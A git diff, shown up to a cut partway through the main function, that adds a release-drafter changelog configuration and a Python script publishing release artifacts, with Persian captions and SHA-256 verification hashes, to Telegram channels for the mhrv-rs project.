diff --git a/.github/release-drafter.yml b/.github/release-drafter.yml
new file mode 100644
index 00000000..02b5753f
--- /dev/null
+++ b/.github/release-drafter.yml
@@ -0,0 +1,79 @@
+# release-drafter config — accumulates merged-PR titles into a draft GitHub
+# Release as PRs land on main, so the English half of docs/changelog/v<ver>.md
+# is prefilled by the time we cut the next release.
+#
+# How it fits with the existing release flow:
+#   - PRs merge → release-drafter updates the draft release tagged `next`
+#   - When ready to ship, run `prepare-release.yml` which reads the draft
+#     body and writes it into `docs/changelog/v<ver>.md` as a stub
+#   - You translate the bullets into Persian above the `---` separator,
+#     merge the prep PR, push the `v<ver>` tag, and release.yml takes over
+#
+# The draft is tagged `next` (not `vX.Y.Z`) so it never collides with the
+# real release-tag namespace. softprops/action-gh-release in release.yml
+# will create a fresh release for the actual `vX.Y.Z` tag — the `next`
+# draft just gets reset by release-drafter on the following PR merge.
+
+name-template: 'Next release (draft)'
+tag-template: 'next'
+
+# Flat bullet template — one line per merged PR, matching the existing
+# docs/changelog/v<ver>.md style:
+#
+#   • <verb-first headline> ([#NN](url)): <full explanation>. Thanks @user
+#
+# We bake the `: <expand>. Thanks @AUTHOR` suffix directly into the
+# template so the maintainer's job is just (a) strip the leading
+# `feat:`/`fix:` Conventional-Commit prefix that PR titles in this repo
+# carry (prepare-release.yml does this automatically with a sed pass),
+# (b) fix the verb tense if needed (`added` → `Add`), and (c) replace
+# `<expand>` with the explanatory clause.
+#
+# Why the placeholder is part of the template and not added later:
+# putting it here means the no-changes-template fallback (below) does
+# *not* get a `<expand>` suffix — only real PR-derived bullets do.
+change-template: '• $TITLE ([#$NUMBER]($URL)): <expand>. Thanks @$AUTHOR'
+change-title-escapes: '\<*_&'
+
+# Fallback if no PRs have merged since the last draft reset. Rare in
+# practice; here as a safety net so the draft body is never empty.
+# Deliberately doesn't follow the `<expand>`-bullet shape so it's
+# obviously a placeholder line, not a real release entry.
+no-changes-template: '_(no PR-tracked changes since the last release)_'
+
+# Skip PRs labelled `release-prep` from the changelog — those are the
+# automated version-bump PRs opened by prepare-release.yml; including
+# them would echo "release: prepare v1.6.6" into the next release notes.
+exclude-labels:
+  - 'release-prep'
+  - 'skip-changelog'
+
+# Auto-apply labels from Conventional Commit title prefixes (optional
+# `(scope)` and `!` breaking-change marker included). The repo already
+# enforces feat:/fix:/etc. on PR titles, so no contributor action is needed.
+# Labels feed exclude-labels above and allow filtering PRs by type later.
+autolabeler:
+  - label: 'release-prep'
+    title:
+      - '/^release:/i'
+  - label: 'type: feature'
+    title:
+      - '/^feat(\(.+\))?!?:/i'
+  - label: 'type: fix'
+    title:
+      - '/^fix(\(.+\))?!?:/i'
+  - label: 'type: chore'
+    title:
+      - '/^chore(\(.+\))?!?:/i'
+  - label: 'type: docs'
+    title:
+      - '/^docs?(\(.+\))?!?:/i'
+  - label: 'type: refactor'
+    title:
+      - '/^refactor(\(.+\))?!?:/i'
+
+# Body of the draft release: just the flat bullet list. No "What's
+# Changed" header, no contributors block — keep it copy-paste-ready
+# into docs/changelog/v<ver>.md.
+template: |
+  $CHANGES
diff --git a/.github/scripts/telegram_publish_files.py b/.github/scripts/telegram_publish_files.py
new file mode 100644
index 00000000..3f64cc07
--- /dev/null
+++ b/.github/scripts/telegram_publish_files.py
@@ -0,0 +1,806 @@
+#!/usr/bin/env python3
+"""Post each release artifact individually to a Telegram channel.
+
+Used by .github/workflows/telegram-publish-files.yml. Reads files from
+--assets-dir, picks a Persian caption per filename, posts via the
+Telegram Bot API `sendDocument` endpoint with --hashtag appended.
+
+Files larger than the Telegram Bot API's 50 MB ceiling are split into
+~45 MB byte chunks via Python (no `split` shell dep) and posted as
+`<name>.part_aa`, `.part_ab`, ... — recipients reassemble with
+`cat <name>.part_* > <name>`.
+
+Re-runnable: posts every file every time. Use carefully when re-running
+for the same version (the channel will get duplicate posts).
+"""
+
+from __future__ import annotations
+
+import argparse
+import hashlib
+import os
+import re
+import sys
+import time
+import urllib.error
+import urllib.parse
+import urllib.request
+import json
+from pathlib import Path
+
+# Telegram sendMessage caps at 4096 chars total. Leave headroom for
+# the announcement header / cross-link footer / hashtag — anything
+# above this gets truncated with a "see full notes on GitHub" tail.
+TG_CHANGELOG_BUDGET = 3500
+
+# Telegram Bot API uploads cap at 50 MB. Pick 45 MB for chunks so the
+# multipart envelope + caption + Telegram's own overhead don't push us
+# over. Bigger chunks (e.g. 49 MB) sometimes hit "Request Entity Too
+# Large" depending on caption length.
+CHUNK_LIMIT_BYTES = 45 * 1024 * 1024
+
+# Sleep between uploads. Telegram's documented rate limit is 1 msg/sec
+# to the same chat, plus a soft "burst" allowance. 1.5s is conservative
+# and means a 20-file release publishes in ~30 s.
+INTER_UPLOAD_SLEEP_SECS = 1.5
+
+# Filename-substring → Persian caption. Order matters: longest /
+# most-specific patterns first, since a shorter pattern (e.g.
+# "android-x86") can match a more-specific filename ("android-x86_64").
+# Match is `pattern in filename`.
+CAPTIONS: list[tuple[str, str]] = [
+    # Android — universal first (the recommended default for non-technical users).
+    ("android-universal", "نسخه اندروید (universal) — برای همه دستگاه‌ها"),
+    ("android-arm64-v8a", "نسخه اندروید (arm64-v8a) — گوشی‌های مدرن ۶۴ بیتی"),
+    ("android-armeabi-v7a", "نسخه اندروید (armv7) — گوشی‌های قدیمی‌تر ۳۲ بیتی"),
+    ("android-x86_64", "نسخه اندروید (x86_64) — شبیه‌ساز ۶۴ بیتی"),
+    ("android-x86", "نسخه اندروید (x86) — شبیه‌ساز"),
+    # Windows.
+    ("windows-amd64", "نسخه ویندوز x64 (۶۴ بیتی)"),
+    ("windows-i686", "نسخه ویندوز x86 (۳۲ بیتی، Win7+)"),
+    # macOS — .app bundles before plain CLI tarballs.
+    ("macos-arm64-app", "نسخه macOS (Apple Silicon) — برنامه گرافیکی .app"),
+    ("macos-amd64-app", "نسخه macOS (Intel) — برنامه گرافیکی .app"),
+    ("macos-arm64", "نسخه macOS (Apple Silicon) — CLI"),
+    ("macos-amd64", "نسخه macOS (Intel) — CLI"),
+    # Linux — musl static first, glibc second.
+    ("linux-musl-amd64", "نسخه لینوکس amd64 (musl static) — Alpine / OpenWRT-x86"),
+    ("linux-musl-arm64", "نسخه لینوکس arm64 (musl static)"),
+    ("linux-amd64", "نسخه لینوکس amd64 (glibc)"),
+    ("linux-arm64", "نسخه لینوکس arm64 (glibc)"),
+    # Embedded targets.
+    ("openwrt-mipsel-softfloat", "نسخه OpenWRT (mipsel softfloat) — روتر MT7621"),
+    ("raspbian-armhf", "نسخه Raspbian (armhf) — رزبری پای ۳۲ بیتی"),
+]
+
+
+def caption_for(filename: str) -> str:
+    """Look up the caption of the first CAPTIONS pattern contained in
+    `filename`; with no hit, build a generic caption around the name."""
+    hits = (text for needle, text in CAPTIONS if needle in filename)
+    # Fallback used only when no pattern occurs in the name.
+    generic = f"نسخه `{filename}`"
+    return next(hits, generic)
+
+
+def order_files(files: list[Path]) -> list[Path]:
+    """Return `files` sorted by the index of the first CAPTIONS pattern
+    contained in each name (Android, Windows, macOS, Linux, embedded).
+    Names matching no pattern go last; ties are ordered by file name."""
+    last_rank = len(CAPTIONS)
+
+    def rank(candidate: Path) -> tuple[int, str]:
+        name = candidate.name
+        # Index of the first pattern found in the name, else the tail rank.
+        hits = (i for i, (needle, _) in enumerate(CAPTIONS) if needle in name)
+        return (next(hits, last_rank), name)
+
+    ordered = sorted(files, key=rank)
+    return ordered
+
+
+def split_file(path: Path, chunk_bytes: int) -> list[Path]:
+    """Split `path` into chunks of at most `chunk_bytes` bytes, written
+    next to it as `<orig>.part_aa`, `.part_ab`, ...; returns the chunk
+    paths in order (empty list for an empty file). Reassemble with
+    `cat <name>.part_* > <name>`.
+
+    Part files left by an earlier run are overwritten, never reused."""
+    parts: list[Path] = []
+
+    def part_name(idx: int) -> str:
+        # Two base-26 letters: aa..az, ba..bz, ... (letters last for 676 parts).
+        first = chr(ord("a") + idx // 26)
+        second = chr(ord("a") + idx % 26)
+        return f"{path.name}.part_{first}{second}"
+
+    idx = 0
+    with path.open("rb") as src:
+        while True:
+            buf = src.read(chunk_bytes)
+            if not buf:
+                break
+            part_path = path.parent / part_name(idx)
+            with part_path.open("wb") as dst:
+                dst.write(buf)
+            parts.append(part_path)
+            idx += 1
+    return parts
+
+
+def send_document(
+    bot_token: str,
+    chat_id: str,
+    file_path: Path,
+    caption: str,
+) -> dict:
+    """POST a single file via the Telegram Bot API sendDocument endpoint.
+    Returns the parsed JSON response. Raises on HTTP error.
+
+    Uses urllib + a hand-rolled multipart/form-data encoder so we don't
+    pull `requests` (the workflow runs on stock GitHub-hosted runners
+    where stdlib-only is preferable for cold-start speed)."""
+    url = f"https://api.telegram.org/bot{bot_token}/sendDocument"
+    boundary = "----mhrvUploadBoundary" + str(int(time.time() * 1000))
+    body = build_multipart(
+        boundary,
+        fields={
+            "chat_id": chat_id,
+            "caption": caption,
+            "parse_mode": "HTML",
+            # Not a preview switch: "false" keeps the normal (non-silent) notification.
+            "disable_notification": "false",
+        },
+        files={"document": (file_path.name, file_path.read_bytes(), "application/octet-stream")},
+    )
+    req = urllib.request.Request(
+        url,
+        data=body,
+        headers={"Content-Type": f"multipart/form-data; boundary={boundary}"},
+        method="POST",
+    )
+    # 5 minute timeout for the actual upload — Telegram occasionally
+    # takes a while to process 40+ MB documents.
+    with urllib.request.urlopen(req, timeout=300) as resp:
+        return json.loads(resp.read().decode("utf-8"))
+
+
+def build_multipart(
+    boundary: str,
+    fields: dict[str, str],
+    files: dict[str, tuple[str, bytes, str]],
+) -> bytes:
+    """Build a multipart/form-data body from text `fields` and from
+    `files` (field name → (filename, bytes, mime)); stdlib only.
+
+    `"`, CR and LF in field names and filenames are percent-encoded so
+    they cannot end the quoted header value or inject a header line."""
+
+    def quoted(text: str) -> str:
+        return text.replace('"', "%22").replace("\r", "%0D").replace("\n", "%0A")
+
+    crlf = b"\r\n"
+    bnd = f"--{boundary}".encode()
+    parts: list[bytes] = []
+    for name, value in fields.items():
+        disposition = f'Content-Disposition: form-data; name="{quoted(name)}"'
+        parts += [bnd, disposition.encode(), b"", value.encode("utf-8")]
+    for name, (filename, data, mime) in files.items():
+        disposition = (
+            f'Content-Disposition: form-data; name="{quoted(name)}"; '
+            f'filename="{quoted(filename)}"'
+        )
+        parts += [bnd, disposition.encode(), f"Content-Type: {mime}".encode(), b"", data]
+    # Closing delimiter; the empty last element makes join() end with CRLF.
+    parts += [f"--{boundary}--".encode(), b""]
+    return crlf.join(parts)
+
+
+def html_escape(s: str) -> str:
+    return s.translate({ord("&"): "&amp;", ord("<"): "&lt;", ord(">"): "&gt;"})  # HTML specials
+
+
+def load_changelog(repo_root: Path, version: str) -> tuple[str | None, str | None]:
+    """Read `docs/changelog/v{version}.md` and split into (Persian, English).
+
+    The repo convention (see `docs/changelog/v1.1.0.md`) is:
+        <!-- comment line -->
+        Persian content...
+        ---
+        English content...
+
+    Returns (None, None) if the file doesn't exist, so callers can fall
+    back to a bare announcement. A half that is missing (no `---`
+    separator) or blank after stripping is None, never an empty string.
+    """
+    path = repo_root / "docs" / "changelog" / f"v{version}.md"
+    if not path.is_file():
+        return None, None
+    text = path.read_text(encoding="utf-8")
+    # Strip leading HTML comments (the standard `<!-- see docs/... -->`
+    # header). Their content is for editors, not readers.
+    text = re.sub(r"^\s*<!--.*?-->\s*", "", text, count=1, flags=re.DOTALL)
+    # Split on the literal `---` line that separates Persian from English.
+    # We require it to be on its own line so an inline `---` inside a code
+    # block doesn't accidentally split the body.
+    parts = re.split(r"\n\s*---\s*\n", text, maxsplit=1)
+    persian = parts[0].strip() or None
+    # A blank English half (separator present, nothing after it) counts as
+    # missing: report None rather than "" so the return type is honoured.
+    english = (parts[1].strip() or None) if len(parts) > 1 else None
+    return persian, english
+
+
+def brief_changelog(text: str, max_total: int = 1500) -> str:
+    """Compress a changelog body to top-level bullets only, with each bullet
+    trimmed to a short readable headline.
+
+    Only lines starting with "• " are kept, so sub-bullets and prose are
+    dropped; " by @user [with ...]" and " from @user" credits are removed.
+    Markdown link `[text](url)` becomes plain `text`, with the special case
+    of `[#nnn](url)` → `#nnn` (issue/PR number stays readable without the
+    visual clutter of the URL). Backticks are left in place; callers are
+    expected to pass the result through `md_to_tg_html` for those.
+
+    Why bullets-only: Telegram channel readers want "what shipped" in a
+    glance, not the architectural detail that lives in the git log + the
+    full `docs/changelog/v*.md` file. The full English text is still in
+    the repo for archival.
+
+    `max_total` caps the assembled brief so the announcement stays well
+    under Telegram's 4096-char sendMessage budget after header / footer
+    chrome is added.
+    """
+    out: list[str] = []
+    total_len = 0
+
+    for raw in text.splitlines():
+        if not raw.startswith("• "):
+            continue
+        body = raw[2:].strip()
+
+        # Strip "by @user with full root cause + fix" / "from @user" /
+        # "by @user". The "with ..." clause after "by @user" runs to the
+        # next closing paren — greedy `[^)]*` is what consumes it
+        # cleanly. Without the greedy form, the trailing "with full
+        # root cause + fix" remained in the headline.
+        body = re.sub(r" by @[\w-]+(?: with [^)]*)?", "", body)
+        body = re.sub(r" from @[\w-]+", "", body)
+
+        # `(PR [#nnn](url))` → `(#nnn)` and bare `[#nnn](url)` → `#nnn`.
+        # Done before generic `[text](url)` so the issue-number form
+        # wins over the catch-all (which would expand the link text).
+        body = re.sub(r"PR \[#(\d+)\]\([^)]+\)", r"#\1", body)
+        body = re.sub(r"\[#(\d+)\]\([^)]+\)", r"#\1", body)
+        body = re.sub(r"\[([^\]]+)\]\([^)]+\)", r"\1", body)
+
+        # Cut at the first natural sentence boundary that isn't too
+        # early. ":" anchored to position ≥ 30 catches "Title: details"
+        # without truncating short headers like "Tests:" / "API:" /
+        # "Build:" that are themselves the headline. ". " catches the
+        # rest. " — " (em-dash with spaces) is our explicit "headline
+        # — body" form in the changelogs.
+        candidates = []
+        for sep, min_pos in ((":", 30), (". ", 5), (" — ", 5)):
+            idx = body.find(sep)
+            if idx >= min_pos and idx < 200:
+                candidates.append(idx)
+        if candidates:
+            body = body[: min(candidates)].rstrip()
+
+        # Hard cap at 200 chars so a single sentence-less bullet
+        # (e.g. comma-separated list) can't dominate the brief.
+        if len(body) > 200:
+            body = body[:197].rstrip() + "…"
+
+        # If our truncation left an unclosed `(`, strip from there. A
+        # dangling `(` reads as a typo in the channel post; better to
+        # drop the parenthesised aside than to show a half-open one.
+        # Same for `[`. When opens outnumber closes, the body is cut at
+        # the last opening char (this also drops a "…" added above).
+        for open_ch, close_ch in (("(", ")"), ("[", "]")):
+            if body.count(open_ch) > body.count(close_ch):
+                last = body.rfind(open_ch)
+                if last > 0:
+                    body = body[:last].rstrip()
+
+        line = f"• {body}"
+        # +1 for the line separator we'll insert when joining.
+        if total_len + len(line) + 1 > max_total:
+            break
+        out.append(line)
+        total_len += len(line) + 1
+
+    return "\n".join(out)
+
+
+def md_to_tg_html(md: str, max_len: int = TG_CHANGELOG_BUDGET) -> str:
+    """Convert a subset of Markdown to Telegram-flavoured HTML.
+
+    Handles only the patterns that show up in our changelog files:
+      - `**bold**`            → `<b>bold</b>`
+      - `[text](url)`         → `<a href="url">text</a>`
+      - `` `code` ``          → `<code>code</code>`
+      - `<!-- comment -->`    → stripped
+      - everything else       → HTML-escaped, line breaks preserved
+
+    Markdown spans are first swapped for placeholders that the escape
+    pass cannot touch, the remainder is escaped, then the spans are put
+    back as Telegram HTML.
+
+    Output longer than `max_len` is cut at the previous newline (or hard
+    at `max_len` for one very long line) and gets a "see full notes"
+    tail. A tag or entity split by the cut is dropped and spans left
+    open are re-closed, so the result is always balanced HTML.
+    """
+    # 1. Strip HTML comments, including multi-line.
+    md = re.sub(r"<!--.*?-->", "", md, flags=re.DOTALL).strip()
+
+    # 2. Carve the markdown spans out into NUL-delimited placeholder tokens;
+    #    NUL is not expected in markdown source, so tokens cannot collide.
+    spans: list[str] = []
+
+    def stash(html: str) -> str:
+        spans.append(html)
+        return f"\x00{len(spans) - 1}\x00"
+
+    # Inline code first — backticks are exclusive of the other patterns.
+    md = re.sub(
+        r"`([^`\n]+)`",
+        lambda m: stash(f"<code>{html_escape(m.group(1))}</code>"),
+        md,
+    )
+    # Links `[text](url)`: the text is HTML-escaped; in the URL only `"`
+    # is escaped, since a raw quote would end the href attribute.
+    md = re.sub(
+        r"\[([^\]]+)\]\(([^)]+)\)",
+        lambda m: stash(
+            f'<a href="{m.group(2).replace(chr(34), "&quot;")}">'
+            f"{html_escape(m.group(1))}</a>"
+        ),
+        md,
+    )
+    # Bold `**text**`. Done after links so a `**[text](url)**` pattern
+    # still works (the link is already a placeholder by now).
+    md = re.sub(
+        r"\*\*([^*\n]+)\*\*",
+        lambda m: stash(f"<b>{html_escape(m.group(1))}</b>"),
+        md,
+    )
+
+    # 3. HTML-escape everything that wasn't a span; placeholders hold only
+    #    NUL and digits, which the escape pass leaves alone.
+    md = html_escape(md)
+
+    # 4. Restore the placeholders, looping because an expansion can itself
+    #    contain a placeholder (e.g. inline code used as link text). The
+    #    len(spans)+1 bound stops a malformed input from running away.
+    for _ in range(len(spans) + 1):
+        new = re.sub(
+            r"\x00(\d+)\x00",
+            lambda m: spans[int(m.group(1))],
+            md,
+        )
+        if new == md:
+            break
+        md = new
+
+    # 5. Truncate to fit Telegram's sendMessage cap, preferably at a newline.
+    if len(md) > max_len:
+        cut = md.rfind("\n", 0, max_len)
+        if cut < max_len // 2:
+            cut = max_len  # very long single line — chop hard
+        # The cut may land inside a tag or entity: drop that fragment.
+        head = re.sub(r"<[^>]*$|&[#\w]*$", "", md[:cut]).rstrip()
+        # Re-close the spans the cut left open so Telegram can parse it.
+        unclosed: list[str] = []
+        for slash, tag in re.findall(r"<(/?)(\w+)[^>]*>", head):
+            if not slash:
+                unclosed.append(tag)
+            elif unclosed:
+                unclosed.pop()
+        head += "".join(f"</{tag}>" for tag in reversed(unclosed))
+        md = head + "\n…\n<i>(see full notes on GitHub)</i>"
+    return md
+
+
+def repo_root_from_script() -> Path:
+    """Return the repo root, taken as two directories above this script's
+    own resolved directory (`<root>/.github/scripts/<script>.py` →
+    `<root>`), so the result does not depend on the working directory."""
+    scripts_dir = Path(__file__).resolve().parent
+    return scripts_dir.parent.parent
+
+
+def sha256_hex(path: Path) -> str:
+    """Hex SHA-256 of `path`, hashed in 1 MiB reads so a large release
+    artifact is never loaded into memory whole just to be hashed."""
+    digest = hashlib.sha256()
+    with path.open("rb") as stream:
+        for block in iter(lambda: stream.read(1024 * 1024), b""):
+            digest.update(block)
+    return digest.hexdigest()
+
+
+def post_file(
+    bot_token: str,
+    chat_id: str,
+    file_path: Path,
+    base_caption: str,
+    hashtag: str,
+) -> bool:
+    """Post one file, split into parts if over CHUNK_LIMIT_BYTES. Returns True
+    only if every upload succeeded; a failed part does not stop later parts.
+
+    Each caption ends with the file's SHA-256 in hex under a Persian
+    "تایید اصالت" (authenticity verification) label, so recipients can
+    `sha256sum <file>` after download and confirm it matches what the
+    channel posted — defends against modified copies if the channel is
+    ever compromised or relayed through a third party."""
+    size = file_path.stat().st_size
+
+    # Compute the original-file hash regardless of whether we'll chunk
+    # it. For chunked uploads, every part's caption shows this hash so
+    # the user can verify the full file once reassembled with `cat`.
+    print(f"  hashing {file_path.name}...", flush=True)
+    full_sha = sha256_hex(file_path)
+
+    if size <= CHUNK_LIMIT_BYTES:
+        caption = (
+            f"<b>{html_escape(base_caption)}</b>\n"
+            f"<code>{html_escape(file_path.name)}</code>\n"
+            f"\nتایید اصالت (SHA-256):\n"
+            f"<code>{full_sha}</code>\n"
+            f"\n{hashtag}"
+        )
+        print(f"  uploading {file_path.name} ({size / 1_048_576:.1f} MB)...", flush=True)
+        try:
+            resp = send_document(bot_token, chat_id, file_path, caption)
+            if not resp.get("ok"):
+                print(f"    !! Telegram returned not-ok: {resp}", flush=True)
+                return False
+            print(f"    ok (message_id={resp['result']['message_id']})", flush=True)
+            return True
+        except urllib.error.HTTPError as e:
+            err_body = e.read().decode("utf-8", errors="replace")[:500]
+            print(f"    !! HTTP {e.code}: {err_body}", flush=True)
+            return False
+        except Exception as e:
+            print(f"    !! exception: {e}", flush=True)
+            return False
+        finally:
+            time.sleep(INTER_UPLOAD_SLEEP_SECS)
+
+    # Too big — split and post each part.
+    print(
+        f"  splitting {file_path.name} ({size / 1_048_576:.1f} MB > "
+        f"{CHUNK_LIMIT_BYTES / 1_048_576:.0f} MB ceiling)...",
+        flush=True,
+    )
+    parts = split_file(file_path, CHUNK_LIMIT_BYTES)
+    if not parts:
+        print(f"    !! split produced 0 parts (empty file?)", flush=True)
+        return False
+
+    n = len(parts)
+    all_ok = True
+    for idx, part_path in enumerate(parts, start=1):
+        # Hash the individual part too — lets the user verify each
+        # downloaded chunk before bothering to reassemble.
+        part_sha = sha256_hex(part_path)
+        part_caption = (
+            f"<b>{html_escape(base_caption)} — قسمت {idx}/{n}</b>\n"
+            f"<code>{html_escape(part_path.name)}</code>\n"
+            f"\nبرای بازسازی فایل اصلی:\n"
+            f"<code>cat {html_escape(file_path.name)}.part_* &gt; "
+            f"{html_escape(file_path.name)}</code>\n"
+            f"\nتایید اصالت این قسمت (SHA-256):\n"
+            f"<code>{part_sha}</code>\n"
+            f"\nتایید اصالت فایل کامل پس از بازسازی (SHA-256):\n"
+            f"<code>{full_sha}</code>\n"
+            f"\n{hashtag}"
+        )
+        psize = part_path.stat().st_size
+        print(
+            f"    uploading part {idx}/{n}: {part_path.name} ({psize / 1_048_576:.1f} MB)...",
+            flush=True,
+        )
+        try:
+            resp = send_document(bot_token, chat_id, part_path, part_caption)
+            if not resp.get("ok"):
+                print(f"      !! Telegram returned not-ok: {resp}", flush=True)
+                all_ok = False
+            else:
+                print(
+                    f"      ok (message_id={resp['result']['message_id']})", flush=True
+                )
+        except urllib.error.HTTPError as e:
+            err_body = e.read().decode("utf-8", errors="replace")[:500]
+            print(f"      !! HTTP {e.code}: {err_body}", flush=True)
+            all_ok = False
+        except Exception as e:
+            print(f"      !! exception: {e}", flush=True)
+            all_ok = False
+        finally:
+            time.sleep(INTER_UPLOAD_SLEEP_SECS)
+            # Remove the part file whether or not its upload succeeded.
+            try:
+                part_path.unlink()
+            except OSError:
+                pass
+
+    return all_ok
+
+
+def files_channel_post_link(chat_id: str, message_id: int) -> str:
+    """Return a `t.me` URL for message `message_id` of the files channel.
+
+    When the `FILES_CHANNEL_USERNAME` env var is non-empty (surrounding
+    whitespace and leading `@` characters are ignored), the public form
+    `https://t.me/<username>/<msg>` is returned, clickable for everyone.
+
+    Otherwise the private form `https://t.me/c/<id>/<msg>` is built,
+    where `<id>` is `chat_id` minus a leading `-100` (or, failing that,
+    a leading `-`). That link works for members of the channel."""
+    handle = os.environ.get("FILES_CHANNEL_USERNAME", "").strip().lstrip("@")
+    if handle:
+        return f"https://t.me/{handle}/{message_id}"
+
+    # Try the longer prefix first so "-100…" is not reduced by just "-".
+    for prefix in ("-100", "-"):
+        if chat_id.startswith(prefix):
+            bare_id = chat_id[len(prefix):]
+            return f"https://t.me/c/{bare_id}/{message_id}"
+    return f"https://t.me/c/{chat_id}/{message_id}"
+
+
+def post_main_channel_pointer(
+    bot_token: str,
+    main_chat_id: str,
+    files_channel_post_link: str,
+    version: str,
+    hashtag: str,
+    channel_username_link: str = "",
+    channel_invite_link: str = "",
+    english_notes_brief: str | None = None,
+) -> bool:
+    """Post a short cross-link to the main announcement channel pointing
+    at the anchor post in the files channel. Replaces the previous
+    behaviour of posting the universal APK + full changelog directly
+    to the main channel — the main channel becomes a discovery surface
+    while the files channel hosts the actual artifacts.
+
+    When `english_notes_brief` is supplied (the brief-extracted English
+    half of `docs/changelog/v{version}.md` via `brief_changelog`), it's
+    rendered between the title and the files-channel link so subscribers
+    see what's new without clicking through. Falls back to the bare
+    pointer if notes aren't available.
+
+    English brief (not Persian full) is what we ship to TG: the audience
+    is the worldwide channel, and short brief-tone bullets read cleanly
+    in a chat client where Persian RTL prose mixed with `<code>` /
+    `<b>` spans rendered awkwardly. The full Persian + full English
+    changelog stays in `docs/changelog/v*.md` for archival.
+
+    Channel-join links (public username + invite hash) go at the bottom so
+    non-members can subscribe before opening the release post. Returns True
+    when Telegram answers ok; failures are printed and reported as False.
+    """
+    parts = [
+        f"<b>📦 mhrv-rs v{html_escape(version)} released</b>",
+        "",
+    ]
+    if english_notes_brief:
+        # Tighter budget than the files-channel announcement since the
+        # cross-link has extra footer chrome (channel-join links).
+        parts.append(md_to_tg_html(english_notes_brief, max_len=TG_CHANGELOG_BUDGET - 400))
+        parts.append("")
+    parts.extend([
+        f"Files (Android APKs, Windows, macOS, Linux, OpenWRT) on the files channel:",
+        "",
+        f"👉 <a href=\"{html_escape(files_channel_post_link)}\">"
+        f"v{html_escape(version)} — all files with SHA-256</a>",
+    ])
+    # Channel-join links. Two forms handle different states of the
+    # files channel: the `t.me/<username>` form works for public
+    # channels and is the prettier link; the `t.me/+<hash>` invite
+    # link works regardless of whether the channel is public, and is
+    # the only path in for private/restricted channels. Showing both
+    # is forgiving — recipients click whichever works for them.
+    if channel_username_link or channel_invite_link:
+        parts.append("")
+        parts.append("Channel:")
+        if channel_username_link:
+            # Render as plain URL (not HTML <a>) so the text shows the
+            # link itself — useful when users share the message via
+            # screenshot or copy-paste outside Telegram, which would
+            # strip the <a href> wrapper.
+            parts.append(html_escape(channel_username_link))
+        if channel_invite_link:
+            parts.append(f"or: {html_escape(channel_invite_link)}")
+    parts.append("")
+    parts.append(hashtag)
+    text = "\n".join(parts)
+    url = f"https://api.telegram.org/bot{bot_token}/sendMessage"
+    data = urllib.parse.urlencode({
+        "chat_id": main_chat_id,
+        "text": text,
+        "parse_mode": "HTML",
+        "disable_web_page_preview": "false",
+    }).encode()
+    print(f"  posting cross-link to main channel {main_chat_id}...", flush=True)
+    try:
+        with urllib.request.urlopen(
+            urllib.request.Request(url, data=data, method="POST"), timeout=30
+        ) as resp:
+            r = json.loads(resp.read().decode("utf-8"))
+            if not r.get("ok"):
+                print(f"    !! main-channel post failed: {r}", flush=True)
+                return False
+            print(
+                f"    ok (message_id={r['result']['message_id']})", flush=True
+            )
+            return True
+    except urllib.error.HTTPError as e:
+        err_body = e.read().decode("utf-8", errors="replace")[:500]
+        print(f"    !! HTTP {e.code}: {err_body}", flush=True)
+        return False
+    except Exception as e:
+        print(f"    !! exception: {e}", flush=True)
+        return False
+
+def main() -> int:
+    parser = argparse.ArgumentParser(description=__doc__)
+    parser.add_argument("--assets-dir", required=True, type=Path)
+    parser.add_argument("--version", required=True, help="e.g. 1.8.0")
+    parser.add_argument("--hashtag", required=True, help="e.g. #v180")
+    args = parser.parse_args()
+
+    bot_token = os.environ.get("BOT_TOKEN")
+    chat_id = os.environ.get("CHAT_ID")
+    if not bot_token or not chat_id:
+        print("BOT_TOKEN and CHAT_ID env vars required", file=sys.stderr)
+        return 2
+
+    if not args.assets_dir.is_dir():
+        print(f"--assets-dir {args.assets_dir} not a directory", file=sys.stderr)
+        return 2
+
+    # Collect all regular files in the directory (no recursion). Skip
+    # split-part leftovers from a previous run of this script if any
+    # exist — we'll regenerate cleanly.
+    raw_files = [
+        p for p in args.assets_dir.iterdir()
+        if p.is_file() and ".part_" not in p.name
+    ]
+    if not raw_files:
+        print(f"no files found in {args.assets_dir}", file=sys.stderr)
+        return 2
+
+    files = order_files(raw_files)
+    print(f"publishing {len(files)} file(s) to Telegram chat {chat_id} for v{args.version}:")
+    for f in files:
+        print(f"  - {f.name}")
+    print()
+
+    # Leading announcement in the files channel. Captured `message_id`
+    # is the anchor that the main-channel cross-link points at — the
+    # main channel doesn't carry files anymore, just a single message
+    # saying "new release, click here." Recipients land on this anchor
+    # and scroll down to see all the platform-specific files.
+    #
+    # We pull the English half of `docs/changelog/v{version}.md`, run it
+    # through `brief_changelog` to keep just the top-level bullets (no
+    # sub-bullets, no contributor mentions, no embedded prose), and
+    # inject that into the announcement. Brief English (not full Persian)
+    # is the right tone for a Telegram channel post: subscribers want
+    # "what shipped" in one glance; the full archival changelog stays in
+    # the repo. Falls back to the bare skeleton if the changelog file
+    # doesn't exist (e.g. an out-of-band re-publish for an old tag).
+    _persian_notes, english_notes = load_changelog(repo_root_from_script(), args.version)
+    english_brief = brief_changelog(english_notes) if english_notes else None
+    announce_lines = [
+        f"<b>📦 mhrv-rs {html_escape('v' + args.version)} released</b>",
+        "",
+    ]
+    if english_brief:
+        announce_lines.append(md_to_tg_html(english_brief))
+        announce_lines.append("")
+    announce_lines.extend([
+        "Per-platform files follow with SHA-256 captions for verification.",
+        "",
+        args.hashtag,
+    ])
+    announce = "\n".join(announce_lines)
+    announce_msg_id: int | None = None
+    try:
+        url = f"https://api.telegram.org/bot{bot_token}/sendMessage"
+        data = urllib.parse.urlencode({
+            "chat_id": chat_id,
+            "text": announce,
+            "parse_mode": "HTML",
+            "disable_web_page_preview": "true",
+        }).encode()
+        with urllib.request.urlopen(
+            urllib.request.Request(url, data=data, method="POST"), timeout=30
+        ) as resp:
+            r = json.loads(resp.read().decode("utf-8"))
+            if not r.get("ok"):
+                print(f"  !! announcement failed: {r}", flush=True)
+            else:
+                announce_msg_id = r["result"]["message_id"]
+                print(
+                    f"  announcement posted (message_id={announce_msg_id})",
+                    flush=True,
+                )
+    except Exception as e:
+        # Non-fatal for the file uploads, but cross-link to the main
+        # channel below will be skipped — without the anchor message_id
+        # there's nothing to point at.
+        print(f"  !! announcement exception: {e}", flush=True)
+    time.sleep(INTER_UPLOAD_SLEEP_SECS)
+
+    failures = 0
+    for f in files:
+        base = caption_for(f.name)
+        ok = post_file(bot_token, chat_id, f, base, args.hashtag)
+        if not ok:
+            failures += 1
+
+    # Cross-link to the main announcement channel. Skipped if MAIN_CHAT_ID
+    # is unset (development / private testing) or if the files-channel
+    # announcement didn't post (no anchor to link to).
